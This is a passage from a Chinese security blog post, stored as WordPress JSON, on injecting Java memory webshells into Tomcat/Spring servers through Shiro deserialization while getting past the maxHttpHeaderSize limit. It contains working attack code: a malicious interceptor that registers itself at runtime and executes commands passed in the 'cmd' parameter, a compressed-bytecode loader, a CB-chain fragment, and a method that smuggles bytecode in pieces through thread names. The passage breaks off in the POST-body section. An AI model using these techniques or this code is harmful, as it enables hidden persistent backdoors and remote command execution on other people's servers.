{"id":30,"date":"2025-06-18T23:20:00","date_gmt":"2025-06-18T15:20:00","guid":{"rendered":"http:\/\/byname6.cn\/?p=30"},"modified":"2025-06-30T19:38:09","modified_gmt":"2025-06-30T11:38:09","slug":"%e5%86%85%e5%ad%98%e9%a9%ac%e7%bb%95%e8%bf%87maxhttpheadersize%e9%99%90%e5%88%b6","status":"publish","type":"post","link":"http:\/\/byname6.cn\/index.php\/2025\/06\/18\/%e5%86%85%e5%ad%98%e9%a9%ac%e7%bb%95%e8%bf%87maxhttpheadersize%e9%99%90%e5%88%b6\/","title":{"rendered":"\u5185\u5b58\u9a6c\u7ed5\u8fc7maxHttpHeaderSize\u9650\u5236"},"content":{"rendered":"\n<p>\u5728\u5229\u7528\u53cd\u5e8f\u5217\u5316\u6ce8\u5165\u5185\u5b58\u9a6c\u7684\u5b9e\u6218\u4e2d\uff0c\u901a\u5e38\u9047\u5230\u73af\u5883\u90fd\u662f\u5efa\u7acb\u5728\u4ee5<strong>Tomcat<\/strong>\u4e3a\u5bb9\u5668\u7684\u73af\u5883\u4e2d\u7684\u3002<\/p>\n\n\n\n<p>\u800cTomcat\u5177\u6709\u4e00\u4e2a<strong>maxHttpHeaderSize<\/strong>\u53c2\u6570\uff1a<strong>\u9650\u5236\u8bf7\u6c42\u5305\u8bf7\u6c42\u5934\u52a0\u8d77\u6765\u7684\u5b57\u7b26\u6570\u603b\u548c\u957f\u5ea6\uff0c\u5305\u62ecGET \/XXX?a=xxx\u3002\u5982\u679c\u8d85\u8fc7\u8fd9\u4e2a\u503c\u5c31\u8fd4\u56de400\u3002<\/strong><\/p>\n\n\n\n<p>\u5728Tomcat\u7684<code>Server.xml<\/code>\u6216\u5728Spring\u7684<code>application.properties<\/code>\u3001<code>application.xml<\/code>\u4e2d\u53ef\u4ee5\u4fee\u6539\u8fd9\u4e2a\u9650\u5236\u7684\u503c\u3002\u5982\u679c\u4e0d\u8fdb\u884c\u4fee\u6539\uff0c\u9ed8\u8ba4\u4e3a<strong>8KB(8192\u4e2aASCII\u5b57\u7b26)<\/strong>\u3002<\/p>\n\n\n\n<p>\u4ee5\u5bf9\u4e00\u4e2a\u5b58\u5728shiro\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u7684Spring\u7ad9\u70b9\u6ce8\u5165\u5185\u5b58\u9a6c\u4e3a\u4f8b\uff0c\u7528CB\u94fe\u6ce8\u5165\u4e00\u4e2a\u6700\u7b80\u5355\u7684<strong><code>Springboot 
Interceptor<\/code><\/strong>\u5185\u5b58\u9a6c\u7684\u5e8f\u5217\u5316\u6d41\u7ecf\u8fc7Base64\u7f16\u7801\u540e\u5927\u6982\u4e3a<strong>4000<\/strong>\u4e2a\u5b57\u7b26\u3002<\/p>\n\n\n\n<p>\u4f46\u6709\u65f6\u5185\u5b58\u9a6c\u7684\u540e\u95e8\u903b\u8f91\u4e0d\u4ec5\u4ec5\u53ea\u6709\u4e00\u4e2a\u7b80\u5355\u7684\u6267\u884c\u547d\u4ee4\u83b7\u53d6\u56de\u663e\uff0c\u53ef\u80fd\u50cf\u51b0\u874e\u3001\u54e5\u65af\u62c9\uff0c\u5185\u7f6e\u8fd8\u5199\u4e86\u5de5\u5177\u7c7b\uff0c\u5bf9shell\u5bc6\u7801\u7684AES\u52a0\u5bc6\uff1b\u6216\u8005\u50cf\u662fLINUX\u4e0b\u7684\u65e0\u6587\u4ef6Agent\u5185\u5b58\u9a6c\uff0c\u5b58\u653e\u4e86\u673a\u5668\u7801\u7f16\u8bd1\u540e\u7684\u5b57\u8282\u6570\u7ec4&#8230;\u8bf8\u5982\u6b64\u7c7b\uff0c\u6709\u53ef\u80fd\u4f1a\u5728\u5b9e\u6218\u4e2d\u5bfc\u81f4\u5e8f\u5217\u5316\u6ce8\u5165\u5185\u5b58\u9a6c\u7684payload\u957f\u5ea6\u8fc7\u957f\u5bfc\u81f4400\u62a5\u9519\u3002<\/p>\n\n\n\n<p>\u8fd9\u91cc\u4e5f\u505a\u4e00\u70b9\u5bf9\u4e8e<strong>\u5185\u5b58\u9a6c\u56de\u663e<\/strong>\u9650\u5236header\u957f\u5ea6\u7684\u8865\u5145\uff0c\u6bd4\u5982\u80fd\u4f20\u5165\u7684\u662fJSP\u5185\u5b58\u9a6c\uff0c\u4f46\u56de\u663e\u957f\u5ea6\u8d85\u51fa<strong><code>maxHttpHeaderSize<\/code><\/strong>\u5bfc\u81f4\u7684\u56de\u663e\u5931\u8d25\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u6ce8\u5165\u5185\u5b58\u9a6c\u53d7\u9650<\/h1>\n\n\n\n<p>\u603b\u7ed3\u51e0\u79cd\u5e38\u89c1\u7684\u7ed5\u8fc7\u957f\u5ea6\u9650\u5236\u7684\u601d\u8def\uff1a<\/p>\n\n\n\n<h2 
class=\"wp-block-heading\">\u538b\u7f29class\u5b57\u8282\u7801\u5b57\u7b26<\/h2>\n\n\n\n<p>\u538b\u7f29\u7b97\u6cd5\u662f\u5bf9\u4e00\u4e2a\u5185\u5bb9\u5229\u7528\u5bc6\u7801\u5b66\u7b97\u6cd5\u8fdb\u884c\u6807\u8bb0\u5e76\u5220\u9664\u201c\u71b5\u4f59\u201d\uff0c\u6700\u540e\u8fd8\u539f\u65b9\u6cd5\u5bf9\u538b\u7f29\u7ed3\u679c\u6839\u636e\u6807\u8bb0\u5c06\u5176\u539f\u5c01\u4e0d\u52a8\u5730\u8fd8\u539f\u3002<\/p>\n\n\n\n<p>\u6211\u4eec\u77e5\u9053\uff0cJava\u5bf9\u4e8e\u4e00\u4e2a\u7c7b\u7684\u52a0\u8f7d\uff0c\u672c\u8d28\u4e0a\u5c31\u662f\u9700\u8981\u83b7\u53d6\u7c7b\u7684\u5b57\u8282\u7801\u5e76\u8fdb\u884c\u64cd\u4f5c\uff0c\u4e43\u81f3\u521d\u59cb\u5316\u3001\u5b9e\u4f8b\u5316\uff0c\u7c7b\u521d\u59cb\u5316\u7684\u8fc7\u7a0b\u4e2d\u89e6\u53d1static\u4ee3\u7801\u5757\uff0c\u5b9e\u4f8b\u5316\u7684\u65f6\u5019\u89e6\u53d1\u6784\u9020\u51fd\u6570\u3002\u7ed3\u5408\u538b\u7f29\u7b97\u6cd5\uff0c\u6211\u4eec\u80fd\u591f\u60f3\u5230\u8fd9\u6837\u4e00\u79cd\u51cf\u5c11payload\u5b57\u7b26\u6570\u91cf\u7684\u5199\u6cd5\uff1a<\/p>\n\n\n\n<p>\u5c31\u4ee5<strong><code>Spring-boot-2.7.0<\/code><\/strong>\u4e0b\u7684<strong><code>Springboot 
Interceptor\u5185\u5b58\u9a6c<\/code><\/strong>\u4e3a\u4f8b\uff0c\u7b80\u5355\u56de\u987e\u4e00\u4e0b\u901a\u8fc7CB\u94fe\u6253\u5165\u7684\u62e6\u622a\u5668\u5185\u5b58\u9a6c\u6d41\u7a0b\uff1a<\/p>\n\n\n\n<p>\u666e\u901a\u7684\u53cd\u5e8f\u5217\u5316\u94fe\u5c31\u662f\u901a\u8fc7\u83b7\u53d6\u6076\u610fInterceptor\u5b58\u50a8\u5230TemplateImpl\u4e2d\uff0c<strong>\u53cd\u5e8f\u5217\u5316\u65f6TemplateImpl\u5c31\u4f1a\u52a0\u8f7d\u8fd9\u4e2a\u6076\u610f\u7684Interceptor\uff0c\u89e6\u53d1\u5176\u9759\u6001\u4ee3\u7801\u5757<\/strong>\uff1b\u8fd9\u4e2a\u6076\u610fInterceptor\u7684\u9759\u6001\u4ee3\u7801\u5757\u91cc\u5c31\u5b9e\u73b0\u4e86\u5c06\u5176\u81ea\u8eab\u5b9e\u4f8b\u5316\u5bf9\u8c61\u52a8\u6001\u6ce8\u518c\u5230\u8fd0\u884c\u670d\u52a1\u7684Spring\u5b9e\u4f8b\u3002<\/p>\n\n\n\n<p>\u6267\u884c\u7684\u8c03\u7528\u94fe\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">TemplateImpl\u7c7b\u52a0\u8f7d\u89e6\u53d1\u6076\u610finterceptor\u7684\u9759\u6001\u4ee3\u7801\u5757 -&gt;<br>interceptor\u7684\u9759\u6001\u4ee3\u7801\u5757\u5b9e\u73b0\u52a8\u6001\u6ce8\u518cinterceptor\u7684\u5bf9\u8c61\u5230Spring\u4e2d\uff0c\u5b8c\u6210\u5185\u5b58\u9a6c\u6ce8\u5165<\/pre>\n\n\n\n<p>\u80fd\u770b\u5f97\u51fa\u6765\u6ce8\u518c\u548c\u5b9e\u73b0\u5185\u5b58\u9a6c\u7684\u903b\u8f91\u90fd\u96c6\u4e2d\u5728\u8fd9\u4e2aInterceptor\u7c7b\u7684static\u9759\u6001\u4ee3\u7801\u5757\u4e2d\uff0c\u90a3\u6211\u4eec\u53ef\u4ee5<strong>\u5c06\u8fd9\u4e2aInterceptor\u7684\u5b57\u8282\u7801\u5229\u7528\u7b97\u6cd5\u8fdb\u884c\u538b\u7f29\u3001base64\u7f16\u7801\uff0c\u5f97\u5230\u4e00\u4e32\u538b\u7f29\u540e\u7684\u5b57\u7b26\u4e32\uff1b\u518d\u91cd\u65b0\u5199\u4e00\u4e2a\u7c7bevil_class\uff0c\u5176\u9759\u6001\u4ee3\u7801\u5757\u4e2d\u4e00\u4e2a\u53d8\u91cf\u50a8\u5b58\u8fd9\u4e32\u538b\u7f29\u3001\u7f16\u7801\u540e\u7684\u5b57\u7b26\u4e32\uff0c\u540e\u7eed\u903b\u8f91\u53ea\u7528\u5bf9\u5176\u89e3\u7801\u3001\u89e3\u538b\u7f29\u5f97\u5230\u539f\u59cb\u7684\u5b57\u8282\u7801\uff0c\u53cd\
u5c04\u8c03\u7528defineClass\u8fdb\u884c\u7c7b\u52a0\u8f7d\uff1b\u6700\u540e\u53ea\u9700\u5c06evil_class\u7684\u5b57\u8282\u7801\u4f20\u5165CB\u94fe\u4e2d\u7684TemplateImpl\u3002<\/strong><\/p>\n\n\n\n<p>\u6574\u4f53\u6267\u884c\u7684\u8c03\u7528\u94fe\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">TemplateImpl\u7c7b\u52a0\u8f7d\u89e6\u53d1evil_class\u7684\u9759\u6001\u4ee3\u7801\u5757 -&gt; <br>evil_class\u5bf9\u89e3\u538b\u7f29\u5f97\u5230\u7684interceptor\u5b57\u8282\u7801\u8fdb\u884c\u7c7b\u52a0\u8f7d\uff0c\u89e6\u53d1interceptor\u7684\u9759\u6001\u4ee3\u7801\u5757 -&gt; <br>interceptor\u7684\u9759\u6001\u4ee3\u7801\u5757\u5b9e\u73b0\u52a8\u6001\u6ce8\u518cinterceptor\u7684\u5bf9\u8c61\u5230Spring\u4e2d\uff0c\u5b8c\u6210\u5185\u5b58\u9a6c\u6ce8\u5165<\/pre>\n\n\n\n<p>\u503c\u5f97\u4e00\u63d0\u7684\u662f\uff0c\u56e0\u4e3a\u6d89\u53ca\u5230\u5bf9\u5b57\u8282\u7801\u7684\u8bfb\u53d6\uff0c\u4e5f\u5c31\u5148\u9700\u8981\u5bf9.java\u6587\u4ef6\u7f16\u8bd1\u4e3a.class\u6587\u4ef6\uff1b\u7531\u4e8e\u5f15\u7528\u4e86\u7b2c\u4e09\u65b9\u4f9d\u8d56\uff0c\u76f4\u63a5javac\u7f16\u8bd1\u4e0d\u65b9\u4fbf(\u8981\u6307\u5b9ajar\u5305)\uff0c\u800c\u76f4\u63a5\u7528\u7b2c\u4e09\u65b9\u4f9d\u8d56\u7ba1\u7406\u5982maven\u7f16\u8bd1\u4f1a\u4ea7\u751f\u5927\u91cf\u8c03\u8bd5\u4fe1\u606f\u7b49\u5197\u4f59\u5b57\u7b26\u589e\u52a0payload\u7684\u957f\u5ea6\u3002\u6240\u4ee5\u9700\u8981\u5148\u5728pom.xml\u7684build\u6a21\u5757\u52a0\u5165<strong><code>&lt;arg&gt;-g:none&lt;\/arg&gt;<\/code><\/strong>\u4f7f\u5f97maven\u4e0d\u8f93\u51fa\u591a\u4f59\u4fe1\u606f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;build&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp;&lt;plugins&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;plugin&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;groupId&gt;org.apache.maven.plugins&lt;\/groupId&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;artifactId&gt;maven-compiler-plugin&lt;\/artifactId&gt;<br> &nbsp; &nbsp; 
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;configuration&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;source&gt;8&lt;\/source&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;target&gt;8&lt;\/target&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;compilerArgs&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;arg&gt;-g:none&lt;\/arg&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;\/compilerArgs&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;\/configuration&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;\/plugin&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp;&lt;\/plugins&gt;<br> &nbsp;&lt;\/build&gt;<\/pre>\n\n\n\n<p>Java\u6807\u51c6\u5e93\u76f4\u63a5\u5bf9\u5b57\u8282\u7801\u538b\u7f29\u7684\u5e38\u89c1\u7b97\u6cd5\uff1aGZIP \/ DEFLATE<\/p>\n\n\n\n<p>\u7ecf\u8fc7\u6d4b\u8bd5\u4e24\u8005\u538b\u7f29\u6bd4\u4f8b\u90fd\u5dee\u4e0d\u591a\uff0c\u5bf9\u4e8e\u4e00\u4e2a\u7b80\u5355\u7684Interceptor\u538b\u7f29\u7387\u80fd\u5927\u6982<strong>60%<\/strong>\uff083836\u538b\u7f29\u52301696\u5b57\u8282\uff09\u3002<\/p>\n\n\n\n<p>\u8fd9\u91cc\u7ed9\u51fa\u538b\u7f29\u5b57\u7b26\u5230\u8f93\u51faCB\u94fe\u7684\u6574\u4e2ademo\uff1a<\/p>\n\n\n\n<p><strong>\u6076\u610finterceptor\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">public class evil_interceptor extends AbstractTranslet implements HandlerInterceptor{<br> &nbsp; &nbsp;static<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp; &nbsp;try {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;WebApplicationContext context = RequestContextUtils.findWebApplicationContext(((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest());<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;org.springframework.web.servlet.handler.AbstractHandlerMapping abstractHandlerMapping = 
(org.springframework.web.servlet.handler.AbstractHandlerMapping)context.getBean(RequestMappingHandlerMapping.class);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;java.lang.reflect.Field field = org.springframework.web.servlet.handler.AbstractHandlerMapping.class.getDeclaredField(\"adaptedInterceptors\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;field.setAccessible(true);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;java.util.ArrayList&lt;Object&gt; adaptedInterceptors = (java.util.ArrayList&lt;Object&gt;)field.get(abstractHandlerMapping);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;evil_inceptor evil_Interceptor=new evil_inceptor();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;adaptedInterceptors.add(evil_Interceptor);<br> &nbsp; &nbsp; &nbsp;  } catch (Exception e) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;throw new RuntimeException(e);<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br> &nbsp; &nbsp;public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {<br> &nbsp; &nbsp; &nbsp; &nbsp;String cmd = request.getParameter(\"cmd\");<br> &nbsp; &nbsp; &nbsp; &nbsp;if (cmd != null) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;try {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Runtime.getRuntime().exec(cmd);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } catch (IOException e) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;e.printStackTrace();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } catch (NullPointerException n) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;n.printStackTrace();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;return true;<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp;return false;<br> &nbsp;  }<br> &nbsp; &nbsp;public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {<br> &nbsp;  }<br> &nbsp; &nbsp;public void transform(DOM document, DTMAxisIterator iterator, 
SerializationHandler handler) throws TransletException {<br> &nbsp;  }<br>}<\/pre>\n\n\n\n<p><strong>\u8f93\u51fainterceptor\u538b\u7f29\u5b57\u7b26\u4e32\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"> &nbsp; &nbsp; ClassPool pool = ClassPool.getDefault();<br> &nbsp; &nbsp; CtClass evil_interceptor = pool.get(\"evil_interceptor\");<br> &nbsp; &nbsp; byte[] compressedBytes = evil_interceptor.toBytecode();<br> &nbsp; &nbsp; String compressedBase64 = Base64.getEncoder().encodeToString(compressedBytes);<br> &nbsp; &nbsp; System.out.println(\"\u6700\u7ec8\u53d1\u9001\u7684Base64\u5b57\u7b26\u4e32: \" + compressedBase64);<\/pre>\n\n\n\n<p><strong>evil_class\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">public class evil_class{<br> &nbsp;static{<br> &nbsp; &nbsp;        String b64 = \"xxx\";<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;byte[] compressedBytes = Base64.getDecoder().decode(b64);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ByteArrayInputStream byteStream = new ByteArrayInputStream(compressedBytes);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ByteArrayOutputStream outStream = new ByteArrayOutputStream();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;try (GZIPInputStream gzipStream = new GZIPInputStream(byteStream)) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;byte[] buffer = new byte[1024];<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;int len;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;while ((len = gzipStream.read(buffer)) != -1) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;outStream.write(buffer, 0, len);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } catch (IOException ex) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;throw new RuntimeException(ex);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;  } catch (Exception e) {<br> &nbsp; &nbsp; &nbsp;  }<br>  
}<br>}<\/pre>\n\n\n\n<p><strong>CB\u94fe\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"> &nbsp; &nbsp; &nbsp; &nbsp;\/\/....<br> &nbsp; &nbsp; &nbsp; &nbsp;Field _name = tmplClass.getDeclaredField(\"_name\");<br> &nbsp; &nbsp; &nbsp; &nbsp;_name.setAccessible(true);<br> &nbsp; &nbsp; &nbsp; &nbsp;_name.set(tmpl, \"evil_class\"); &nbsp;\/\/.....\u83b7\u53d6evil_class........................<br> &nbsp; &nbsp; &nbsp; &nbsp;\/\/....<\/pre>\n\n\n\n<p><strong>\u4f18\u70b9\uff1a<\/strong><\/p>\n\n\n\n<p>\u8fd9\u4e2a\u65b9\u6cd5\u76f8\u5f53\u4e8e\u4e00\u4e2a\u6280\u5de7\uff0c\u53ef\u4ee5\u548c\u5176\u5b83\u65b9\u6cd5\u6df7\u642d\u3001\u6216\u8005payload\u504f\u957f\u7684\u60c5\u51b5\u4e0b\u6709\u6548\u7f29\u77ed\u3002<\/p>\n\n\n\n<p><strong>\u7f3a\u70b9\uff1a<\/strong><\/p>\n\n\n\n<p>\u8fd9\u4e2a\u65b9\u6cd5\u4ec5\u5bf9\u4e8e<strong>\u66f4\u957f\u7684payload\u6709\u663e\u8457\u6548\u679c<\/strong>\uff0c\u5982\u679c\u5bf9\u7b80\u5355\u7684\u5185\u5b58\u9a6c\u53cd\u5e8f\u5217\u5316payload\u4f7f\u7528\u53cd\u800c\u9002\u5f97\u5176\u53cd\uff1a\u56e0\u4e3a\u5982\u679c\u62e6\u622a\u5668\u7684\u5b57\u8282\u7801\u672c\u6765\u5c31\u77ed\uff0c\u538b\u7f29\u4e5f\u51cf\u5c11\u4e0d\u4e86\u592a\u591a\uff0c\u53cd\u800c\u5728evil_class\u4e2d\u989d\u5916\u5199\u5165\u7684\u89e3\u7801\u89e3\u538b\u7f29\uff0c\u7c7b\u52a0\u8f7d\u903b\u8f91\u7684\u5b57\u8282\u7801\u957f\u5ea6<strong>\uff08\u5927\u69821300\u5b57\u8282\uff09<\/strong>\u90fd\u6bd4\u538b\u7f29\u7701\u4e0b\u6765\u7684\u591a\u3002<\/p>\n\n\n\n<p>\u8fd9\u79cd\u7f29\u51cfpayload\u7684\u601d\u60f3\u901a\u5e38\u662f\u5728\u5982Spel\u6ce8\u5165\u8fd9\u79cd\u8868\u8fbe\u5f0f\u6ce8\u5165\u66f4\u6613\u4e8e\u5229\u7528\uff0c\u59822024-36401<a href=\"https:\/\/medium.com\/@numencyberlabs\/cve-2024-36401-memory-shell-exploit-for-jdk-11-22-1a40162494c9\">https:\/\/medium.com\/@numencyberlabs\/cve-2024-36401-memory-shell-exploit-for-jdk-11-22-1a40162494c9<\/a><\/p>\n\n\n\n<h2 
class=\"wp-block-heading\">\u591a\u6b21\u53d1\u5305\u5c06\u7f16\u7801\u5206\u5757\u5b58\u5165\u5168\u5c40\u53d8\u91cf<\/h2>\n\n\n\n<p>\u4e2a\u4eba\u89c9\u5f97\u8fd9\u662f\u6ce8\u5165\u65f6\u7528\u4e8e\u7ed5\u8fc7\u9650\u5236\u6700\u597d\u5229\u7528(\u53d1\u5305\u65f6payload\u957f\u5ea6\u6700\u5c0f)\u7684\u601d\u8def\uff0c\u8fd9\u4e2a\u65b9\u6cd5\u9996\u5148\u5728\u8fd9\u7bc7\u535a\u5ba2\u4e2d\u63d0\u5230\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-embed\"><div class=\"wp-block-embed__wrapper\">\nhttps:\/\/y4tacker.github.io\/2022\/04\/14\/year\/2022\/4\/%E6%B5%85%E8%B0%88Shiro550%E5%8F%97Tomcat-Header%E9%95%BF%E5%BA%A6%E9%99%90%E5%88%B6%E5%BD%B1%E5%93%8D%E7%AA%81%E7%A0%B4\n<\/div><\/figure>\n\n\n\n<p>\u601d\u60f3\u5c31\u662f\u5bfb\u627e\u4e00\u4e2a\u80fd\u591f\u50a8\u5b58\u591a\u6b21\u53d1\u5305\u7684\u53c2\u6570\u7684\u5168\u5c40\u5bf9\u8c61\uff0c\u5b8c\u6574\u5b58\u5165\u5b57\u8282\u7801\u7684\u7f16\u7801\u503c\u540e\uff0c\u518d\u53d1\u4e00\u4e2a\u5305\u89e3\u7801\u3001\u7c7b\u52a0\u8f7d\u8fd9\u4e2a\u5b57\u8282\u7801\u3002<\/p>\n\n\n\n<p>\u8fd9\u91cc\u627e\u5230\u7684\u662fThread\u5bf9\u8c61\u7684name\u5c5e\u6027\uff0c\u4e5f\u5c31\u662f\u7ebf\u7a0b\u540d\u3002\u8fd9\u6837\u7684\u80fd\u627e\u5230\u7684\u5c5e\u6027\u6709\u5f88\u591a\u79cd\uff0cThreadLocal\u3001ServletContext().setAttribute()\u3001\u5355\u72ec\u5f00\u4e00\u4e2aThread\u7f13\u5b58buffer\u3001\u6587\u672b\u5728\u5df2\u7ecf\u6ce8\u5165\u5185\u5b58\u9a6c\u7684\u524d\u63d0\u4e0b\u63d0\u5230\u7684final\u53d8\u91cf\u7b49\u7b49\u90fd\u80fd\u8fbe\u5230\u7c7b\u4f3c\u7684\u6548\u679c\u3002<\/p>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u4ee5\u6587\u4e2d\u7684payload\u4e3a\u4f8b\uff1a<\/p>\n\n\n\n<p>\u7b2c\u4e00\u6b21\u6267\u884c\u5148\u989d\u5916\u8bbe\u7f6e\u4e00\u4e2aThread\u8fdb\u884c\u5b58\u5165\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">Thread.currentThread().setName(\u201ctest\u201d);<\/pre>\n\n\n\n<p>\u4e2d\u95f4\u5bf9\u5b57\u8282\u7801base64\u7f16\u7801\u5206\u5757\u4f20\u8f93<\/p>\n\n\n\n<pre 
class=\"wp-block-preformatted\">try {<br> &nbsp;ThreadGroup a = Thread.currentThread().getThreadGroup();<br> &nbsp;java.lang.reflect.Field v2 = a.getClass().getDeclaredField(\"threads\");<br> &nbsp;v2.setAccessible(true);<br> &nbsp;Thread[] o = (Thread[]) v2.get(a);<br> &nbsp;for(int i = 0; i &lt; o.length; ++i) {Thread z = o[i];if (z.getName().contains(\"test\")){z.setName(z.getName()+\"\u5206\u6bb5\u4f20\u8f93\u7684\u5b57\u8282\u7801base64\u7f16\u7801\");<br> }}}catch (Exception e){}<\/pre>\n\n\n\n<p>\u6700\u540e\u83b7\u53d6\u8fd9\u4e2aThread name\uff0c\u5c06\u5176\u4e2d\u7684\u503c\u8fdb\u884c\u5904\u7406\u5e76\u7c7b\u52a0\u8f7d\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">try {ThreadGroup a = Thread.currentThread().getThreadGroup();<br>java.lang.reflect.Field v2 = a.getClass().getDeclaredField(\"threads\");<br>v2.setAccessible(true);<br>Thread[] o = (Thread[]) v2.get(a);for(int i = 0; i &lt; o.length; ++i) (<br>Thread z = o[i];<br>if (z.getName().contains(\"test\")){<br> &nbsp; byte[] x = org.apache.shiro.codec.Base64.decode(z.getName().replaceAll(\"test\", \"\"));<br> &nbsp; java.lang.reflect.Method defineClassMethod=ClassLoader.class.getDeclaredMethod(\"defineClass\",byte[].class,int.class, int.class);<br> defineClassMethod.setAccessible(true);<br> ((Class)defineClassMethod.invoke(a.class.getClassLoader(), x, 0, x.length)).newInstance();<br>}}}catch (Exception e){}<\/pre>\n\n\n\n<h2 
class=\"wp-block-heading\">\u4ecePOST\u8bf7\u6c42\u4f53\u4e2d\u52a0\u8f7d\u5b57\u8282\u7801<\/h2>\n\n\n\n<p>\u6587\u9996\u63d0\u5230\u8fc7\uff0cmaxHttpHeaderSize\u662f\u9488\u5bf9\u4e8e\u8bf7\u6c42\u5934\u7684\u957f\u5ea6\uff0c\u800cPOST\u8bf7\u6c42\u4f53\u4e0d\u5c5e\u4e8e\u8bf7\u6c42\u5934\u3002\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u5728\u9759\u6001\u4ee3\u7801\u5757\u4e2d\u5199\u4eceRequest\u53d8\u91cf\u4e2d\u83b7\u53d6POST\u53c2\u6570\u7684\u503c\uff0c\u5b9e\u9645\u4e0a\u5c31\u662f\u6076\u610finterceptor\u7684\u5b57\u8282\u7801\u7f16\u7801\u6d41(\u76f4\u63a5<strong><code>getParameter<\/code><\/strong>)\uff0c\u5c06\u5176\u89e3\u7801\u540e\u83b7\u53d6\u5b57\u8282\u7801\uff0c\u53cd\u5c04\u8c03\u7528defineClass\u8fdb\u884c\u7c7b\u52a0\u8f7d\u3002<\/p>\n\n\n\n<p>\u5bf9\u4e8e\u8fd9\u79cd\u65b9\u6cd5Tomcat\u548cSpringboot\u7684\u5b9e\u73b0\u7565\u6709\u4e0d\u540c\uff0c\u4e3b\u8981\u533a\u522b\u5728\u4e8erequest\u5bf9\u8c61\u7684\u83b7\u53d6\uff0c\u8be6\u60c5\u53ef\u4ee5\u770b<a 